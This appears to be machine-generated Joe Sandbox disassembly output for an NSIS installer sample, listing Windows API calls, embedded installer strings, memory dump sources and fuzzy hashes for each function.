                                                  • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DD0
                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                    • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                    • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                  • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                  Strings
                                                  • Inst, xrefs: 00402EA3
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                  • Null, xrefs: 00402EB5
                                                  • Error launching installer, xrefs: 00402E0C
                                                  • soft, xrefs: 00402EAC
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-787788815
                                                  • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                  • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                  • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                  • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                  • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                  • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                  • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                  • CoTaskMemFree.OLE32(?), ref: 00406113
                                                  • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                  • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                  Strings
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-730719616
                                                  • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                  • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                  • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                  • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                  • GetSysColor.USER32(00000000), ref: 0040423A
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                  • SetBkMode.GDI32(?,?), ref: 00404252
                                                  • GetSysColor.USER32(?), ref: 00404265
                                                  • SetBkColor.GDI32(?,?), ref: 00404275
                                                  • DeleteObject.GDI32(?), ref: 0040428F
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402616
                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402639
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264F
                                                    • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                  • String ID: 9
                                                  • API String ID: 1149667376-2366072709
                                                  • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                  • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                  • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                  • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                  • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                  • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                  • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                  APIs
                                                  • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                  • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                  • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                  • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                  • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                  • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                  • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                  • GetTickCount.KERNEL32 ref: 00402D53
                                                  • wsprintfW.USER32 ref: 00402D81
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                    • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                  • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                  • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                  • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                  • GetMessagePos.USER32 ref: 00404ADF
                                                  • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9D
                                                  • wsprintfW.USER32 ref: 00402CD1
                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                  • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                  • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                  • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                  APIs
                                                  • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                  • wsprintfW.USER32 ref: 00404A70
                                                  • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$&B
                                                  • API String ID: 3540041739-2907463167
                                                  • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                  • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                  • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                  • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 0040623F
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                  • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406253
                                                  • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406266
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                  • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                  • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                  • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                  • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                  • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                  • String ID: 8
                                                  • API String ID: 1453599865-4194326291
                                                  • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                  • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                  • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                  • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                  • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                    • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1941528284-0
                                                  • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                  • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                  • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                  • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                  • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                  • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                  • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
